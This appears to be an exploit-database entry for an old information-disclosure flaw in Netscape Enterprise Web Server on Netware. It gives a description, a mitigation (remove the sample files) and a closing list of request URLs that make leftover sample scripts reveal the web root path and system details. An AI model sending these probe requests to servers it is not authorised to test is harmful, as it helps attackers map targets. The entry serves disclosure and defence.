Netscape Enterprise Web Server Path and System Information Disclosure Vulnerability

vendor:

Enterprise Web Server

by:

SecurityFocus

7.5

CVSS

HIGH

Path and System Information Disclosure

200

CWE

Product Name: Enterprise Web Server

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Netware

2002

Netscape Enterprise Web Server Path and System Information Disclosure Vulnerability

Netscape Enterprise Web Server for Netware contain several sample files which leak system information, this information can be obtained by remote users. An attacker is able to send a request, for an affected sample file, that will cause the host to disclose the location of the web root path. Certain sample files will also reveal detailed system specific information.

Mitigation:

Disable the sample files or remove them from the web server.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/4874/info

It has been reported that Netscape Enterprise Web Server may disclose path and system information to a remote user.

Netscape Enterprise Web Server for Netware contain several sample files which leak system information, this information can be obtained by remote users.

An attacker is able to send a request, for an affected sample file, that will cause the host to disclose the location of the web root path. Certain sample files will also reveal detailed system specific information. 

http://webserver/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/test.jse

http://webserver/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse

http://webserver/perl/samples/env.pl

http://webserver/perl/samples/lancgi.pl

http://webserver/perl/samples/volscgi.pl

http://webserver/perl/samples/ndslogin.pl

http://webserver/netbasic/websinfo.bas